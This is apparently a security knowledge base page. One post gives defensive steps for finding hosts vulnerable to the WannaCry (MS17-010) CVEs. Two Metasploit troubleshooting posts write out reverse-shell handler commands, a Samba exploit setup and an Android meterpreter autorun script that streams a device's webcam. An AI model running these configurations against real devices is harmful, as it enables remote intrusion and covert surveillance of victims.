Knowledge Base

Ask A Question



Nexpose: WannaCry - Scanning & Reporting [00jay]

In light of the recent WannaCry Ransomware attacks, I thought it'd be great to share ways of finding out which assets are susceptible to this attack. 1. Create a custom scan template to check for MS17-010 The easiest way to create a Custom template is by making a copy of an existing template: * Administration tab -> Templates * Click: "Manage" * Copy "Full audit enhanced logging without Web Spider" Template * IMPORTANT: Name your copy of the scan template * Click: "Vulnerability Checks" tab * Expand: "By Individual Check" dropdown * Click: "Add Checks" button * Enter: MS17-010 (As of 5/15/17, there are 192 individual checks) Be sure to remove all checks from the "By Category" and "By Check Type" sections to ensure that only the individual checks are loaded for the scan(s). 2. If you want to create a Dynamic Asset Group (DAG) for assets vulnerable to this attack: * Create a new DAG with the following filters: > 'CVE ID' 'is' CVE-2017-0143 > 'CVE ID' 'is' CVE-2017-0144 > 'CVE ID' 'is' CVE-2017-0145 > 'CVE ID' 'is' CVE-2017-0146 > 'CVE ID' 'is' CVE-2017-0147 > 'CVE ID' 'is' CVE-2017-0148 Change "Match (all) of the specified filters." to "Match (any) of the specified filters." Hit "SEARCH". You should then have a result of all assets that have ANY of those CVEs specified above. 3. You can also create a SQL report to list ANY asset affected by ANY of the 6 CVEs: ```sql SELECT da.ip_address AS "IP Adress", da.host_name AS "Host Name", dv.title AS "Title", dv.description AS "Description", dv.severity AS "Severity" FROM dim_vulnerability dv JOIN dim_asset_vulnerability_solution das USING(vulnerability_id) JOIN dim_asset da USING(asset_id) WHERE title ILIKE '%2017-0143%' OR title ILIKE '%2017-0144%' OR title ILIKE '%2017-0145%' OR title ILIKE '%2017-0146%' OR title ILIKE '%2017-0147%' OR title ILIKE '%2017-0148%' ``` (Please keep in mind that it will list every instance of any of the CVEs in question.) There are currently 32 checks for each CVE, there are 6 CVEs; a total of 192 checks. However, an asset should not list more than one check for each CVE which should result at most 6 instances per asset. You can create a SQL query to check for only the count or unique instances that way the report contains less rows.

Posted by Edward Sheehy about a year ago


Metasploit: I am experiencing a problem with multi_console_command [Leonardo Gintoli]

Hi, I'm having problems with the multi_console_command component in Metasploit. This is what I run in the msfconsole: ~~~~ Use exploit/multi/handler Set payload android/meterpreter/ reverse_tcp Set LHOST Set LPORT 3460 Set ExitOnSession false Set AutoRunScript multi_console_command -rc scriptcamandroid.rc Exploit -j -z ~~~~ In the Metasploit root, the file `scriptcamandroid.rc` has the following commands: ~~~~ webcam_stream -i 2 -q 45 -d 84000 exit ~~~~ After Metasploit opens the session, it automatically starts autorun with this multi console command: ~~~~ Session ID 1 ( -> processing AutoRunScript 'multi_console_command -rc scriptcamandroid.rc' Multi Command Execution Meterpreter Script Console ~~~~ OPTIONS: ~~~~ -cl <opt> Commands to execute. The command must be enclosed in double quotes and separated by a comma. -h Help menu. -rc <opt> Text file with list of commands, one per line. -sl Hide commands for work in background sessions ~~~~ The script commands are not executed. This problem has been present since I updated Metasploit through msfupdate and updated the linux kernel. I tried a clean install of Ubuntu and reinstalled Metasploit, but the problem remains. Then I tried with an old version of Kali that had not been upgraded, and it works perfectly. I also tried using an old version of Metasploit with Ubuntu updated, but the bug remains.

Posted by Stephanie Coyle about a year ago


Metasploit: I receive a msfcli error when experimenting with Kali Linux [hcl]

I just started my experiments with Metasploit on Kali Linux Here's what I did: ~~~~ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST= LPORT=443 E ~~~~ pivoting to another: ~~~~ msf exploit(handler) > search samba [!] Database not connected or cache not built, using slow search ~~~~ However, `db_rebuild_cache` did not help. ~~~~ msf exploit(handler) > use exploit/linux/samba/lsa_transnames_heap msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell/reverse_tcp [-] The value specified for PAYLOAD is not valid. msf exploit(lsa_transnames_heap) > show payloads msf exploit(lsa_transnames_heap) > ~~~~ Is there a reason why there are no payloads? The same payload loads fine in msfconsole. After that I did some testing and scrolling commands, and this error pops up: ~~~~ m[-] RbReadline Error: TypeError no implicit conversion from nil to integer ["/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:2770:in `[]'", "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:2770:in `update_line'", "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:3526:in `block in rl_redisplay'", "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:3521:in `each'", "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:3521:in `rl_redisplay'", "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:4665:in `_rl_internal_char_cleanup'", "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:4726:in `readline_internal_charloop'", "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:4790:in `readline_internal'", "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:4812:in `readline'", "/opt/metasploit/apps/pro/msf3/lib/readline_compatible.rb:77:in `readline'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/input/readline.rb:90:in `pgets'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/shell.rb:184:in `run'", "/opt/metasploit/apps/pro/msf3/msfconsole:169:in `<main>'"] ~~~~ Well, after that I gave it another shot and here what I received: ~~~~ msf exploit(handler) > use exploit/linux/samba/lsa_transnames_heap msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell/reverse_tcp PAYLOAD => linux/x86/shell/reverse_tcp msf exploit(lsa_transnames_heap) > show options Module options (exploit/linux/samba/lsa_transnames_heap): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE LSARPC yes The pipe name to use [-] Invalid payload defined: linux/x86/shell/reverse_tcp ~~~~ The first two problems appear on two different machines. The other two did not try to replicate "database not connected" and "payload problem." Is msfcli being deprecated?

Posted by Stephanie Coyle about a year ago